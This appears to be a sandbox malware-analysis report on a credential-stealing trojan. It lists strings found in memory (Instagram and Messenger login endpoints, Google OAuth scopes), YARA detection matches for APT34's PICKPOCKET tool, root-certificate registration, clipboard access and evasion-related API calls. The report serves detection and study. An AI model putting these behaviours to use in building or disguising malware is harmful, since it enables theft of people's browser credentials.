Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000002.00000003.329852304.0000000002ABC000.00000004.00000040.sdmp, 56BB1610C0318054.exe, 00000004.00000003.259393537.0000000002F48000.00000004.00000001.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp, ecvD64F.tmp.8.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=485847574.1601477586
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.259051074.0000000002F74000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp, ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/cursor-replay.cur
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/folder-applications.svg
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/icon-announcement.svg
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/icon-file-download.svg
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/mac-ico.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/cloudprint
Source: 56BB1610C0318054.exe String found in binary or memory: https://www.google.com/cloudprint/enab
Source: 56BB1610C0318054.exe String found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connector
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connectorHN
Source: Web Data1611971454381.2.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.259051074.0000000002F74000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com;
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/
Source: 56BB1610C0318054.exe String found in binary or memory: https://www.googleapis.com/auth/calend
Source: 56BB1610C0318054.exe String found in binary or memory: https://www.googleapis.com/auth/calendar.readonly
Source: 56BB1610C0318054.exe, 00000004.00000003.259047142.0000000002F70000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/calendar.readonlyAPL
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.259047142.0000000002F70000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/cast-edu-messaging
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: 56BB1610C0318054.exe String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyourc
Source: 56BB1610C0318054.exe String found in binary or memory: https://www.googleapis.com/auth/clouddevices
Source: 56BB1610C0318054.exe, 00000004.00000003.259047142.0000000002F70000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/clouddevicesaP
Source: 56BB1610C0318054.exe String found in binary or memory: https://www.googleapis.com/auth/h
Source: 56BB1610C0318054.exe String found in binary or memory: https://www.googleapis.com/auth/hangouts
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.259047142.0000000002F70000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/hangouts.readonly
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/hangoutsrx=n
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/meetings
Source: 56BB1610C0318054.exe String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwri
Source: 56BB1610C0318054.exe String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwrite
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwriteu
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.259047142.0000000002F70000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.258939900.0000000002F4E000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/userinfo.email
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26908291-4
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.259051074.0000000002F74000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com;
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.com/
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.com/accept:
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.com/sec-fetch-site:
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.comsec-fetch-mode:
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.messenger.com
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.messenger.com/
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.messenger.com/accept:
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.messenger.com/login/nonce/
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.messenger.com/origin:
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Roaming\1611971443428.exe Code function: 8_2_0040AE4D OpenClipboard, 8_2_0040AE4D

E-Banking Fraud:

barindex
Registers a new ROOT certificate
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext, 0_2_1001F720

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 2.2.56BB1610C0318054.exe.32a0000.6.unpack, type: UNPACKEDPE Matched rule: APT34_PICKPOCKET Author: unknown
Source: 4.2.56BB1610C0318054.exe.30f0000.6.unpack, type: UNPACKEDPE Matched rule: APT34_PICKPOCKET Author: unknown
PE file has a writeable .text section
Source: Cyfj6XGbkd.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 56BB1610C0318054.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10019D40 LoadLibraryA,GetProcAddress,GetCurrentThread,NtSetInformationThread, 0_2_10019D40
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10019F00 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess, 0_2_10019F00
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10019F50 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess, 0_2_10019F50
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10019FA0 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess, 0_2_10019FA0
Source: C:\Users\user\AppData\Roaming\1611971443428.exe Code function: 8_2_0040C516 NtQuerySystemInformation, 8_2_0040C516
Source: C:\Users\user\AppData\Roaming\1611971443428.exe Code function: 8_2_0040C6FB memset,CreateFileW,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary, 8_2_0040C6FB
Contains functionality to communicate with device drivers
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_00403660: DeviceIoControl, 0_2_00403660
Detected potential crypto function
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_00403E2C 0_2_00403E2C
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_00404050 0_2_00404050
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_004093D5 0_2_004093D5
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_00403FA9 0_2_00403FA9
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1000C063 0_2_1000C063
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1000B883 0_2_1000B883
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_100060F0 0_2_100060F0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_100169BD 0_2_100169BD
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_100099E0 0_2_100099E0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_100071F0 0_2_100071F0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10009257 0_2_10009257
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10010AED 0_2_10010AED
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10008340 0_2_10008340
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1000E380 0_2_1000E380
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1000ABA0 0_2_1000ABA0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1000B3B0 0_2_1000B3B0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1001EBD0 0_2_1001EBD0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_100083F0 0_2_100083F0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1000BC57 0_2_1000BC57
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1000C483 0_2_1000C483
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10010590 0_2_10010590
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1001EDDB 0_2_1001EDDB
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1000FF71 0_2_1000FF71
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_1000C063 2_2_1000C063
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_1000B883 2_2_1000B883
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_100060F0 2_2_100060F0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_100169BD 2_2_100169BD
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_100099E0 2_2_100099E0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_100071F0 2_2_100071F0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_10009257 2_2_10009257
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_10010AED 2_2_10010AED
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_10008340 2_2_10008340
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_1000E380 2_2_1000E380
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_1000ABA0 2_2_1000ABA0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_1000B3B0 2_2_1000B3B0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_1001EBD0 2_2_1001EBD0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_100083F0 2_2_100083F0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_1000BC57 2_2_1000BC57
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_1000C483 2_2_1000C483
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_10010590 2_2_10010590
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_1001EDDB 2_2_1001EDDB
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_1000FF71 2_2_1000FF71
Source: C:\Users\user\AppData\Roaming\1611971443428.exe Code function: 8_2_00404BE4 8_2_00404BE4
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 28_2_00F4A0C3 28_2_00F4A0C3
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 28_2_00F4963B 28_2_00F4963B
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 28_2_00F46A1E 28_2_00F46A1E
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 28_2_00F4A7BB 28_2_00F4A7BB
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 28_2_00F49B7F 28_2_00F49B7F
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 28_2_00F4B51C 28_2_00F4B51C
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 6D2DB66A98EC5730BDCBC41DC7C78210FE24FE48BF7E44B59AB01C2084900456
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: String function: 10010534 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: String function: 10010534 appears 35 times
PE file contains strange resources
Source: 1611971443428.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1611971443428.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: Cyfj6XGbkd.exe, 00000000.00000000.221272611.0000000000412000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameVBCABLE_ControlPanel.exeJ vs Cyfj6XGbkd.exe
Source: Cyfj6XGbkd.exe, 00000000.00000002.243942106.00000000022D0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamenlsbres.dllj% vs Cyfj6XGbkd.exe
Source: Cyfj6XGbkd.exe, 00000000.00000002.243947116.00000000022E0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs Cyfj6XGbkd.exe
Source: Cyfj6XGbkd.exe, 00000000.00000002.243964941.00000000022F0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs Cyfj6XGbkd.exe
Source: Cyfj6XGbkd.exe Binary or memory string: OriginalFilenameVBCABLE_ControlPanel.exeJ vs Cyfj6XGbkd.exe
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Uses 32bit PE files
Source: Cyfj6XGbkd.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 00000000.00000002.244341295.0000000002880000.00000040.00000001.sdmp, type: MEMORY Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000002.00000002.333865446.00000000026F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.261783876.0000000002620000.00000040.00000001.sdmp, type: MEMORY Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.56BB1610C0318054.exe.26f0000.5.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.Cyfj6XGbkd.exe.2880000.5.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.56BB1610C0318054.exe.10000000.7.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.Cyfj6XGbkd.exe.10000000.6.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.56BB1610C0318054.exe.26f0000.5.raw.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.56BB1610C0318054.exe.10000000.7.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.56BB1610C0318054.exe.2620000.5.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.56BB1610C0318054.exe.2620000.5.raw.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.Cyfj6XGbkd.exe.2880000.5.raw.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.56BB1610C0318054.exe.32a0000.6.unpack, type: UNPACKEDPE Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 4.2.56BB1610C0318054.exe.30f0000.6.unpack, type: UNPACKEDPE Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: classification engine Classification label: mal93.bank.troj.spyw.evad.winEXE@34/38@4/3
Source: C:\Users\user\AppData\Roaming\1611971443428.exe Code function: 8_2_0040CE93 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,Process32NextW,FindCloseChangeNotification, 8_2_0040CE93
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 28_2_00F41058 CoCreateInstance, 28_2_00F41058
Source: C:\Users\user\AppData\Roaming\1611971443428.exe Code function: 8_2_0040D9FC FindResourceW,SizeofResource,LoadResource,LockResource, 8_2_0040D9FC
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe File created: C:\Users\user\AppData\Local\Login Data1611971442537 Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:6436:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2148:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5628:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello002
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello001
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5564:120:WilError_01
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign__install_r3
